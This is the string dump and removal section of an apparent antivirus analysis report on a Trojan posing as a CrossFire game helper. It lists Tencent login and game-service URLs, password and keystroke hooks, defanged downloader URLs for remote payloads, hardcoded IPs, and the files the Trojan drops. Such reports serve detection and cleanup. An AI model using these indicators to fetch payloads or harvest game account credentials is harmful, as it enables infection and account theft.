hXXp://kf.qq.com/cgi-bin/common?rand=0.7021259550817557&command=command=C00006&fromtype=kfweb&fromtoolid=kfweb514&type=getCFSpend&area=
Referer:hXXp://kf.qq.com/game/consume_records.html?code=cf
hXXp://apps.game.qq.com/cgi-bin/cf/userinfo/userinfo.cgi?ssn=
hXXp://VVV.baidu.com/
hXXp://bbs.cf.qq.com/home.php?mod=task&do=apply&id=5
hXXp://bbs.cf.qq.com/home.php?mod=spacecp&ac=credit&showcredit=1
hXXp://bbs.cf.qq.com/forum.php?mod=forumdisplay&fid=30503&page=6
&extra=&replysubmit=yes&infloat=yes&handlekey=fastpost&inajax=1
hXXp://bbs.cf.qq.com/forum.php?mod=post&action=reply&fid=30503&tid=


&posttime=
hXXp://bbs.cf.qq.com/home.php?mod=task&do=draw&id=5
hXXp://bbs.cf.qq.com/forum.php
&searchkey=15051408311873756101000000000000&from=1&question=免费枪&vip=0&bangdou=1
%7C322%7C
*&checkparam=cf%7Cyes%7C
&ams_checkparam=cf%7Cyes%7C
&e_code=0&g_code=0&eas_url=http%3A%2F%2Fbang.qq.com%2Fshop%2Findex%2Fcf%2F&eas_refer=&sServiceDepartment=xinyue&sServiceType=cf&sArea=
Referer:hXXp://bang.qq.com/comm-htdocs/js/ams/v0.2R02/ajaxcdr.swf
hXXp://apps.game.qq.com/ams/ame/ame.php?ameVersion=0.3&sServiceType=cf&iActivityId=38135&sServiceDepartment=xinyue&set_info=xinyue
hXXp://bangbang.qq.com/php/robott3nologin/servey
Referer:hXXp://bang.qq.com/actcenter/index/cf
hXXp://bang.qq.com/ugc1/getActRecommend
game=cf&mid=0&eid=5&surl=http://bangbang.qq.com/php/login?game=cf&durl=http://bang.qq.com/actcenter/index/cf?&ref=ingame01&ref=ingame01
hXXp://bang.qq.com/user/scorePersonalAcenter
Referer: hXXp://bang.qq.com/main/tradeinfo/
game=bangbang&mid=9&eid=9000&surl=http://bang.qq.com/main/tradeinfo/&durl=http://bang.qq.com/main/tradeinfo/&world=0&serviceType=2&ref=
hXXp://bang.qq.com/user/scorePersonal
hXXp://bang.qq.com/comm-htdocs/js/ams/v0.2R02/ajaxcdr.swf
hXXp://cf.ams.game.qq.com/ams/ame/ame.php?ameVersion=0.3&sServiceType=cf&iActivityId=38135&sServiceDepartment=group_f
&e_code=0&g_code=0&eas_url=http%3A%2F%2Fdaoju.qq.com%2Fmall%2Fjudou2.0%2Fcf.shtml&eas_refer=&sServiceDepartment=djc&sServiceType=dj
hXXp://apps.game.qq.com/ams/ame/ame.php?ameVersion=0.3&sServiceType=dj&iActivityId=11117&sServiceDepartment=djc&set_info=djc
&e_code=0&g_code=0&eas_url=http%3A%2F%2Fdaoju.qq.com%2Fmall%2Fjudou2.0%2Fcf.shtml&eas_refer=&sServiceDepartment=djc
gameId=&sArea=&iSex=&sRoleId=&iGender=&sServiceType=dj&objCustomMsg=&areaname=&roleid=&rolelevel=&rolename=&areaid=&iActivityId=11117&iFlowId=96910&g_tk=
Referer:hXXp://daoju.qq.com/comm-htdocs/js/milo/ajaxcdr.swf?0.9721381550078127
hXXp://djcapp.game.qq.com/daoju/v3/api/app/e_app/add_jf_firstlogin.php?appSource=ios&appVersion=35&sDeviceID=&p_tk=
&e_code=0&g_code=0&eas_url=http%3A%2F%2Fdaoju.qq.com%2Fmall%2Ftask.shtml&eas_refer=&sServiceDepartment=djc
gameId=&sArea=&iSex=&sRoleId=&iGender=&sServiceType=dj&objCustomMsg=&areaname=&roleid=&rolelevel=&rolename=&areaid=&iActivityId=35644&iFlowId=204638&g_tk=
hXXp://apps.game.qq.com/ams/ame/ame.php?ameVersion=0.3&sServiceType=dj&iActivityId=35644&sServiceDepartment=djc&set_info=djc
hXXp://iyouxi.vip.qq.com/ams3.0.php?_c=page&actid=23314&callback=vipSignNew.signCb&g_tk=
hXXp://iyouxi.vip.qq.com/ams3.0.php?actid=52002&g_tk=
hXXp://iyouxi.vip.qq.com/ams3.0.php?_c=page&actid=22249&g_tk=
hXXp://iyouxi.vip.qq.com/ams3.0.php?actid=23074&g_tk_type=1&g_tk=
hXXp://iyouxi.vip.qq.com/ams3.0.php?_c=page&actid=54963&callback=vipSignNew.signCb&g_tk=
&e_code=0&g_code=0&eas_url=http%3A%2F%2Fxinyue.qq.com%2Fweb201410%2Fwebgame.shtml&eas_refer=http%3A%2F%2Fxinyue.qq.com%2Fweb201410%2Fwebgame.shtml&sServiceDepartment=xinyue&sServiceType=tgclub
Referer: hXXp://xinyue.qq.com/comm-htdocs/js/milo/ajaxcdr.swf?0.7271989360451698
hXXp://apps.game.qq.com/ams/ame/ame.php?ameVersion=0.3&sServiceType=tgclub&iActivityId=21547&sServiceDepartment=xinyue&set_info=xinyue
hXXp://starvip.qq.com/fcg-bin/v2/fcg_mobile_starvip_site_checkin?g_tk=
&_=1454839692917
hXXp://x.pet.qq.com/vip_platform?cmd=set_sign_info&timer=1454839703753&callback=jQuery110205429354978259653_1454839692914&token=
msg": "
&pvsrc=102&s_p=0|http|&s_v=6.1.0.496&ozid=511022&vipid=&actid=68391&sid=&callback=json14530355412865&cache=3654
hXXp://iyouxi.vip.qq.com/ams3.0.php?g_tk=
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_0 like Mac OS X) AppleWebKit/600.1.3 (KHTML, like Gecko) Version/8.0 Mobile/12A4345d Safari/600.1.4
hXXp://proxy.vac.qq.com/cgi-bin/srfentry.fcgi?ts=1456988761581&g_tk=
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 9_2_1 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Mobile/13D15 QQ/6.2.2.402 Pixel/640 NetType/WIFI Mem/86
&_=1452520903377
hXXp://pay.video.qq.com/fcgi-bin/sign?callback=jQuery111006800204519842937_1452520903238&low_login=1&uin=
hXXp://buluo.qq.com/cgi-bin/bar/card/bar_list_by_page
hXXp://buluo.qq.com/cgi-bin/bar/user/sign
hXXp://qun.qzone.qq.com/cgi-bin/get_group_list?callbackFun=woaiwang&uin=
Referer: hXXp://qiandao.qun.qq.com/cgi-bin/sign
Host: qiandao.qun.qq.com
hXXp://qiandao.qun.qq.com/cgi-bin/sign
hXXp://qiandao.qun.qq.com/cgi-bin/new_flag
hXXp://c.pc.qq.com/fcgi-bin/signin?callback=jsonp1453084008086&_=1453084046097&mood_id=238&checkin_date=&remark=一支穿云箭 千军万马来相见。
08 08 08 50
hXXp://cfzhushou.com/cfzs/help.html
hXXp://cfzhushou.com/help.html
hXXp://ip.qq.com/cgi-bin/myip
hXXps://aq.qq.com/cn2/safe_service/device_lock
aid=21000124&captype=&protocol=https&clientype=2&disturblevel=&apptype=2&noBorder=noborder&showtype=embed&uin=
hXXps://ssl.captcha.qq.com/cap_union_verify_new?random=1480258509499
&pt_randsalt=0&u1=http://cf.qq.com&h=1&t=1&g=1&from_ui=1&ptlang=2052&action=2-4-1457704626950&js_ver=10151&js_type=1&login_sig=&pt_uistyle=32&aid=21000124&daid=8&
hXXp://ossweb-img.qq.com/images/clientpop/act/cf/GpmHelpAct.js
http2://ossweb
hXXp://ossweb
"img":"http2(.*?).jpg"
"hXXp://(.*?)":{
hXXp://leesin.zuhaowan.com-
hXXp://leesin.zuhaowan.cn
hXXp://captcha.qq.com/getimage?aid=210001040.5721703316085041
hXXp://cf.ams.game.qq.com/ams/ame/ame.php?ameVersion=0.3&sServiceType=cf&iActivityId=41615&sServiceDepartment=group_f
hXXp://apps.game.qq.com/ams/ame/ame.php?ameVersion=0.3&sServiceType=qqgame&iActivityId=41615&sServiceDepartment=group_h&set_info=group_h
hXXp://webd.tgp.qq.com/cf/info_proxy/weapon_stat_info?&&zone_id=
1970.01.01 08:00:00
function timea(){var d,s;d=new Date();d.setTime('
hXXp://cf.ams.game.qq.com/ams/ame/ame.php?ameVersion=0.3&sServiceType=cf&iActivityId=55856&sServiceDepartment=group_f
hXXp://apps.game.qq.com/cf/a20160726hxb/getUserTask.php?action=getMyTaskList&iArea=
Referer:hXXp://cf.qq.com/act/a20160726hxb/index.htm
hXXp://apps.game.qq.com/daoju/appmarket/daoju_promotion/cloud_ticket/QueryCloudTicket.php?acctid=A100078&id=28&time=0.23177661886438727&_=1461381268102
"sMsg":"MODULE OK"
&e_code=0&g_code=0&eas_url=http%3A%2F%2Fbang.qq.com%2Fshop%2Findex%2Fcf%2F&eas_refer=http%3A%2F%2Fbang.qq.com%2Fmain%2Ftradeinfo%2F&sServiceDepartment=xinyue
gameId=&sArea=&iSex=&sRoleId=&iGender=&sServiceType=tgclub&objCustomMsg=&areaname=&roleid=&rolelevel=&rolename=&areaid=&iActivityId=38135&iFlowId=
hXXp://apps.game.qq.com/ams/ame/ame.php?ameVersion=0.3&sServiceType=tgclub&iActivityId=38135&sServiceDepartment=xinyue&set_info=xinyue
gameId=&sArea=&iSex=&sRoleId=&iGender=&sServiceType=tgclub&objCustomMsg=&areaname=&roleid=&rolelevel=&rolename=&areaid=&iActivityId=38135&iFlowId=214216&g_tk=
|322|
*&checkparam=cf|yes|
&ams_checkparam=cf|yes|
sCdKey=
hXXp://cf.ams.game.qq.com/ams/ame/ame.php?ameVersion=0.3&sServiceType=cf&iActivityId=8918&sServiceDepartment=x1m1
sMsg" : "
\gzip.dll
`.data
gzip.pdb
_u%SV
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E)
hXXp://apps.game.qq.com/cgi-bin/cf/a20090409forceout/getinfo.cgi
hXXp://cfzhushou.com/pay.html
hXXps://ssl.ptlogin2.qq.com/ptqrshow?appid=21000124&e=2&l=M&s=4&d=72&v=4&t=0.061519597441372864&daid=8
&js_ver=10151&js_type=1&login_sig=7qKho-IT4nBHQJBVoTYw6p-IGP0hieZLRsmCy5MWU7g0bRJNRkb5q8yH7BUA7cTM&pt_uistyle=20&aid=21000124&daid=8&
hXXps://ssl.ptlogin2.qq.com/ptqrlogin?ptredirect=1&u1=http://cf.qq.com/cp/a20160223czxlx/index.htm?e_code=213709&h=1&t=1&g=1&from_ui=1&ptlang=2052&action=6-0-
game.qq.com
hXXps://xui.ptlogin2.qq.com/cgi-bin/xlogin?appid=21000124&s_url=hXXp://apps.game.qq.com&style=34
hXXp://cf.qq.com/cfvip/
hXXp://xinyue.qq.com
;ptlogin2
apps.game.qq.com
hXXp://login.game.qq.com/comm-cgi-bin/login/LoginReturnInfo.cgi?callback=jsonp21&game=cf
nickName":"
?kernel32.dll
{56FDF344-FD6D-11d0-958A-006097C9A090}
{EA1AFB91-9E28-4B86-90E9-9E9F8A5EEFAF}
Report
themepassword
SysShadow.HostWnd
{6AEDBD6D-3FB5-418A-83A6-7F45229DC872}
VBScript.RegExp
1970-01-01 00:00:00
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Accept: image/gif, image/bmp, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
background(?:-image)?:.*?[\s]*?url[\s]*?\([#
']?(.*?)[#
onkeydown|
onkeyup|
onkeypress|
wA{0002DF05-0000-0000-C000-000000000046}
{D30C1661-CDAF-11D0-8A3E-00C04FC9E26E}
{6D5140C1-7436-11CE-8034-00AA006009FA}
text|password|file
?)-D%f`
location.reload()
window.location.href="
{25336920-03F9-11CF-8FD0-00AA00686F13}
hXXp://ajax.googleapis.com/ajax/libs/jquery/1.9.1/jquery.min.js
document.all.retjs.innerText=
javascript:document.body.contentEditable='true';document.designMode='on';void 0;
javascript:document.body.contentEditable='false';document.designMode='on';void 0;
javascript:document.onsdragstart=document.onselectstart=document.oncontextmenu=function(){return true}
javascript:document.onselectstart = document.oncontextmenu = document.onmousedown = document.onkeydown = function(){return true;};
WarnOnHTTPSToHTTPRedirect
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings
HKEY_CLASSES_ROOT
HKEY_CURRENT_USER
HKEY_LOCAL_MACHINE
HKEY_USERS
type=password
[password]
var jies = document.getElementsByTagName('object');for(var jie in jies){if(jies[jie].classid=='clsid:D27CDB6E-AE6D-11cf-96B8-444553540000'){jies[jie].removeNode(true);}}
user.qzone.qq.com
mail.qq.com
onkeyup
type='password'
type="password"
, 1, , ,
var jie = document.createStyleSheet();jie.addRule('html','
').value="
document.getElementById('
LocationURL
{34A715A0-6587-11D0-924A-0020AFC7AC4D}
SysShadow.Menu
Microsoft.XMLDOM
14:00~16:00
12:00-19:00
1.2.18
%*.*f
MSWHEEL_ROLLMSG
WSOCK32.dll
msscript.ocx
VVV.dywt.com.cn
USER32.DLL
\\.\Smartvsd
\\.\PhysicalDrive%d
\\.\Scsi%d:
HTTP/1.0
%s <%s>
Reply-To: %s
From: %s
To: %s
Subject: %s
Date: %s
Cc: %s
%a, %d %b %Y %H:%M:%S
SMTP
;3 #>6.&
'2, / 0&7!4-)1#
(*.htm;*.html)|*.htm;*.html
its:%s::%s
(*.avi)|*.avi
WPFT532.CNV
WPFT632.CNV
EXCEL32.CNV
write32.wpc
Windows Write
mswrd632.wpc
Word for Windows 6.0
wword5.cnv
Word for Windows 5.0
mswrd832.cnv
mswrd632.cnv
Word 6.0/95 for Windows & Macintosh
html32.cnv
.PAVCOleException@@
.PAVCOleDispatchException@@
right-curly-bracket
left-curly-bracket
0123456789
c:\%original file name%.exe
GetKeyboardState
InternetCanonicalizeUrlA
1.0.15.507
T%Program Files%\NamuADLook.dll
mscoree.dll
- floating point support not loaded
- CRT not initialized
- Attempt to initialize the CRT more than once.
VVV.kubei9.com
VVV.kubei9.com
1.3.6.1
(*.*)
1.0.0.0
6.0.2600.0 (xpclient.010817-1148)
6.0.2600.0
{557CF400-1A04-11D3-9A73-0000F81EF32E}
{557CF401-1A04-11D3-9A73-0000F81EF32E}
{557CF402-1A04-11D3-9A73-0000F81EF32E}
{557CF405-1A04-11D3-9A73-0000F81EF32E}
{557CF406-1A04-11D3-9A73-0000F81EF32E}

%original file name%.exe_3308_rwx_01FE0000_00013000:

.text
`.rdata
@.data
.rsrc
@.reloc
1.2.3
deflate 1.2.3 Copyright 1995-2005 Jean-loup Gailly
inflate 1.2.3 Copyright 1995-2005 Mark Adler
<fd:%d>
%c%c%c%c%c%c%c%c%c%c
MSVCRT.dll
KERNEL32.dll
zlib1.dll
!"#$%&'()* ,-./012
DLL support by Alessandro Iacopetti & Gilles Vollant

TcService.exe_2764:

.text
`.rdata
@.data
.rsrc
t$(SSh
~%UVW
u$SShe
CF_Helper.dll
wininet.dll
HttpOpenRequestA
HttpSendRequestA
HttpQueryInfoA
hXXp://baike2016.blog.163.com/blog/static/26993501420171281319931/
\CF_Helper.dll
@.reloc
HTTP/1.1
%Program Files%\sesvcs_%d_56089.exe
sesvcs_%d_56089.exe
hXXp://down.9udn.com/aload/as/33.txt
%Program Files%\23.txt
%Program Files%\NamuADLook.dll
hXXp://xzdownad.zglhsw.com/aload/cp/NamuADLook.dll
function not supported
operation canceled
address_family_not_supported
operation_in_progress
operation_not_supported
protocol_not_supported
operation_would_block
address family not supported
broken pipe
inappropriate io control operation
not supported
operation in progress
operation not permitted
operation not supported
operation would block
protocol not supported
operator
GetProcessWindowStation
C:\Users\Administrator\Documents\Tencent Files\1148797355\FileRecv\DLL
\xxx\Helper.pdb
Helper.dll
KERNEL32.dll
ShellExecuteA
SHELL32.dll
InternetCrackUrlA
HttpQueryInfoW
WININET.dll
GetProcessHeap
GetCPInfo
zcÁ
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"><security><requestedPrivileges><requestedExecutionLevel level="requireAdministrator" uiAccess="false"></requestedExecutionLevel></requestedPrivileges></security></trustInfo><application xmlns="urn:schemas-microsoft-com:asm.v3"><windowsSettings><dpiAware xmlns="hXXp://schemas.microsoft.com/SMI/2005/WindowsSettings">true</dpiAware></windowsSettings></application></assembly>
7.84888<8@8
6 696?6{6
14686<6@6
5 5(50585
? ?$?,?@?`?
>$>0>4>8><>
https
Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)
http=
Content-Type: application/x-www-form-urlencoded
hXXps://
hXXp://
crossfire.exe
%d&&'
123456789
00003333
deflate 1.1.3 Copyright 1995-1998 Jean-loup Gailly
inflate 1.1.3 Copyright 1995-1998 Mark Adler
F%*.*f
CNotSupportedException
commctrl_DragListMsg
Afx:%x:%x:%x:%x:%x
Afx:%x:%x
COMCTL32.DLL
CCmdTarget
__MSVCRT_HEAP_SELECT
Broken pipe
Inappropriate I/O control operation
Operation not permitted
user32.dll
iphlpapi.dll
SHLWAPI.dll
MPR.dll
WINMM.dll
WS2_32.dll
VERSION.dll
WinExec
GetKeyState
USER32.dll
GetViewportOrgEx
GDI32.dll
WINSPOOL.DRV
RegCloseKey
RegOpenKeyExA
RegCreateKeyExA
ADVAPI32.dll
ole32.dll
OLEAUT32.dll
COMCTL32.dll
CreateDialogIndirectParamA
UnhookWindowsHookEx
SetWindowsHookExA
SetViewportOrgEx
OffsetViewportOrgEx
SetViewportExtEx
ScaleViewportExtEx
GetViewportExtEx
comdlg32.dll
.PAVCException@@
Shell32.dll
Mpr.dll
Advapi32.dll
User32.dll
Gdi32.dll
Kernel32.dll
(&07-034/)7 '
?? / %d]
%d / %d]
.PAVCFileException@@
: %d]
(*.*)|*.*||
(*.WAV;*.MID)|*.WAV;*.MID|WAV
(*.WAV)|*.WAV|MIDI
(*.MID)|*.MID|
(*.txt)|*.txt|
(*.JPG;*.PNG;*.BMP;*.GIF;*.ICO;*.CUR)|*.JPG;*.PNG;*.BMP;*.GIF;*.ICO;*.CUR|JPG
(*.JPG)|*.JPG|PNG
(*.PNG)|*.PNG|BMP
(*.BMP)|*.BMP|GIF
(*.GIF)|*.GIF|
(*.ICO)|*.ICO|
(*.CUR)|*.CUR|
%s:%d
windows
.PAVCNotSupportedException@@
out.prn
(*.prn)|*.prn|
%d.%d
%d/%d
1.6.9
unsupported zlib version
png_read_image: unsupported transformation
%d / %d
Bogus message code %d
libpng error: %s
libpng warning: %s
1.1.3
bad keyword
libpng does not support gamma background rgb_to_gray
Palette is NULL in indexed image
(%d-%d):
%ld%c
.PAVCObject@@
.PAVCSimpleException@@
.PAVCMemoryException@@
.?AVCNotSupportedException@@
.PAVCResourceException@@
.PAVCUserException@@
.?AVCCmdTarget@@
.?AVCCmdUI@@
.?AVCTestCmdUI@@
.PAVCArchiveException@@
C:\TcService.exe
#include "l.chs\afxres.rc" // Standard components
cOXY/P.Z0.0.QR00/ZPP0000000/0PPZR.BI@/DE0,
<?xml version="1.0" encoding="UTF-8" standalone="yes"?><assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><assemblyIdentity name="E.App" processorArchitecture="x86" version="5.2.0.0" type="win32"/><dependency><dependentAssembly><assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="x86" publicKeyToken="6595b64144ccf1df" language="*" /></dependentAssembly></dependency><trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"> <security> <requestedPrivileges> <requestedExecutionLevel level="requireAdministrator" uiAccess="false"/> </requestedPrivileges> </security></trustInfo></assembly>PADPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADD
T%Program Files%\NamuADLook.dll
mscoree.dll
kernel32.dll
- floating point support not loaded
- CRT not initialized
- Attempt to initialize the CRT more than once.
USER32.DLL
VVV.kubei9.com
VVV.kubei9.com
1.3.6.1
(*.*)
1.0.0.0

sesvcs_963_56089.exe_1956:

.text
`.rdata
@.data
.rsrc
@.reloc
8%u/P
operator
GetProcessWindowStation
_CorExeMain
.detour
222.187.222.209
123.149.255.10:7077
NtQueryKey
?456789:;<=
!"#$%&'()* ,-./0123
?mac=%I64d&clickurl=%s&fromurl=%s&ver=%d&unionid=%d&iver=%d&uver=%d
EXPLORER.EXE
RegOpenKeyTransactedW
RegCreateKeyTransactedW
RegDeleteKeyTransactedW
?mac=%I64d&ver=%d&uver=%d&iver=%d&iswork=%d
E:\code\code\operate_text1015\operate_text\svn_Click_V_Click_LaoLiao\Release\WJDC1230_7777_42222.pdb
GetProcessHeap
KERNEL32.dll
USER32.dll
GDI32.dll
RegDeleteKeyW
RegCloseKey
RegQueryInfoKeyW
RegEnumKeyExW
RegOpenKeyExW
RegCreateKeyExW
RegCreateKeyW
ADVAPI32.dll
SHELL32.dll
ole32.dll
OLEAUT32.dll
SHLWAPI.dll
COMCTL32.dll
MSIMG32.dll
WS2_32.dll
InternetOpenUrlW
HttpQueryInfoW
FindFirstUrlCacheEntryW
DeleteUrlCacheEntryW
FindNextUrlCacheEntryW
WININET.dll
GdiplusShutdown
gdiplus.dll
IPHLPAPI.DLL
GetCPInfo
zcÁ
#*1892 $
%,3:;4-&
.?AUDWebBrowserEvents2@@
ýezccc{
$/%DS
.CCCO222VBAAo
:::`121]
(('0"!!,
NNMSgfeu?B>T&&%0
<requestedExecutionLevel level="asInvoker" uiAccess="false"></requestedExecutionLevel>
<assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="x86" publicKeyToken="6595b64144ccf1df" language="*"></assemblyIdentity>
=(=,=0=4=
5!5.585[5
%0S0i0
> >$>(>,>
;*<0<4<8<<<
7 7$7(7,7074787
? ?@?`?|?
mscoree.dll
KERNEL32.DLL
- Attempt to initialize the CRT more than once.
- CRT not initialized
- floating point support not loaded
WUSER32.DLL
dbghelp.dll
MSCOREE.DLL
hXXp://
00_URL=
7/get_apis/paths/UPath0.txt
DEF_URL=
DEF_TEST_URL=
DEF_SERVICE_SUPPORT=
Windows NT 6.1
Windows NT 5.1
--URL_QUICK_LINK_BEG--
--URL_QUICK_LINK_END--
04_NEVAGATE_INKEY_PROB=
%I64d,%s
ntdll.dll
advapi32.dll
kernelbase.dll
kernel32.dll
User32.DLL
DSound.dll
Winmm.dll
Y%dMÝ%d
HTTP://
desktop.ini
index.dat
Shell.Explorer
msimg32.dll
%s\%s
HKEY_CURRENT_CONFIG
HKEY_DYN_DATA
HKEY_PERFORMANCE_DATA
HKEY_USERS
HKEY_LOCAL_MACHINE
HKEY_CURRENT_USER
HKEY_CLASSES_ROOT
God bless you...Crush restart
1URL=
10UVSUPPORT=
11SKEYWORD=
riched20.dll
Advapi32.dll
..\unstall000.exe
7SPROB=%d[^-^]
9CBTNPROB=%d[^-^]
10UVSUPPORT=%d[^-^]
12DEF_XY_MOVE=%d[^-^]
13MAXUACOUNT=%d[^-^]
%d%d%d.txt
%I64d,%d
%Program Files%\sesvcs_963_56089.exe
[.]color=rgb(12,204,108);bold=true;fsize=-13[/.]%d[.]color=rgb(89,89,89);bold=false[/.]
[.]color=rgb(12,204,108);bold=true[/.]%d[.]color=rgb(89,89,89);bold=false[/.]
[.]color=rgb(0,0,0)[/.]%s
[.]color=rgb(0,0,0)[/.]%sc[.]color=rgb(12,204,108);fsize=-13;bold=true[/.]%s[.]color=rgb(153,153,153);bold=false[/.]
[.]color=rgb(0,0,0)[/.]%s
[.]color=rgb(12,204,108);bold=true[/.]%d[.]color=rgb(136,136,136);bold=false[/.]
[.]color=rgb(12,204,108);bold=true[/.]%s
[.]color=rgb(89,89,89);bold=false[/.]%s
[.]color=rgb(12,204,108);bold=true;fsize=-12[/.]%d [.]color=rgb(89,89,89);bold=false[/.]
[.]color=rgb(251,81,0);bold=true[/.]%s[.]color=rgb(102,102,102);bold=false[/.]
Z[.]color=rgb(0,0,0)[/.]%s
[.]color=rgb(12,204,108)[/.] %s[.]color=rgb(255,0,0)[/.] %s
[.]color=rgb(0,138,250);link=102;linkcolor=rgb(26,160,255)[/.]%s^[.]bold=true[/.]
[.]color=rgb(12,204,108);bold=true[/.]%d[.]bold=true[/.]
^[.]color=rgb(0,0,0)[/.]%s
[.]color=rgb(12,204,108)[/.] %s[.]color=rgb(157,157,157)[/.] %s
[.]color=rgb(12,204,108);bold=true;fsize=-12[/.] %d [.]color=rgb(89,89,89);bold=false[/.]
[.]color=rgb(12,208,104);fsize=-16;[/.] %s[.]color=rgb(0,0,0);fsize=-16;[/.]?
%sf[.]color=rgb(51,51,51);fsize=-12[/.]%s
[.]color=rgb(12,204,108)[/.]%s[.]color=rgb(255,0,0)[/.] %s
360.cn
7, 1, 0, 1120
(C) 360.cn All Rights Reserved.
SoftMgr.exe

%original file name%.exe_3308_rwx_10001000_00033000:

f9z.vk
@Microsoft.XMLDOM
dwmapi.dll
Riched20.dll
Riched32.dll
{00000000-0000-0000-C000-000000000046}
{34A715A0-6587-11D0-924A-0020AFC7AC4D}
kernel32.dll
ole32.dll
gdiplus.dll
GdiPlus.dll
gdi32.dll
user32.dll
Advapi32.dll
advapi32.dll
User32.dll
ntdll.dll
Ole32.dll
shell32.dll
atl.dll
program internal error number is %d.
:"%s"
:"%s".
GetProcessHeap
&..0`%X
.text
`.rdata
@.data
.rsrc
.reloc


Remove it with Ad-Aware

  1. Click (here) to download and install Ad-Aware Free Antivirus.
  2. Update the definition files.
  3. Run a full scan of your computer.


Manual removal*

  1. Terminate malicious process(es) (How to End a Process With the Task Manager):

    TcService.exe:2764

  2. Delete the original Trojan file.
  3. Delete or disinfect the following files created/modified by the Trojan:

    %Program Files%\23.txt (30170 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\25FDO7QC\01[1].txt (26410 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\SB1GUIDO.txt (111 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\8D93UTC3\NamuADLook[1].dll (16650 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JYNOWECL\26993501420171281319931[1].htm (29233 bytes)
    C:\CF_Helper.dll (202 bytes)
    %Program Files%\NamuADLook.dll (20370 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\4ZZNMJGQ\33[1].txt (40 bytes)
    C:\ProgramData\MD PlatForm\3073838834852099154 (15 bytes)
    %Program Files%\unstall000.exe (3361 bytes)
    C:\ProgramData\tmpst\shst (21 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\XG142QU4.txt (114 bytes)
    C:\ProgramData\MD PlatForm\2242737149763168244 (15 bytes)
    C:\ProgramData\MD PlatForm\UContext (182 bytes)
    C:\ProgramData\MD PlatForm\7 (1 bytes)
    C:\ProgramData\MD PlatForm\5 (1 bytes)
    C:\TcService.exe (1670 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\S0FG29A4.txt (89 bytes)
    C:\exdui.dll (110 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\8D93UTC3\2672760322016102115848934[1].htm (107215 bytes)

  4. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
  5. Reboot the computer.

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.
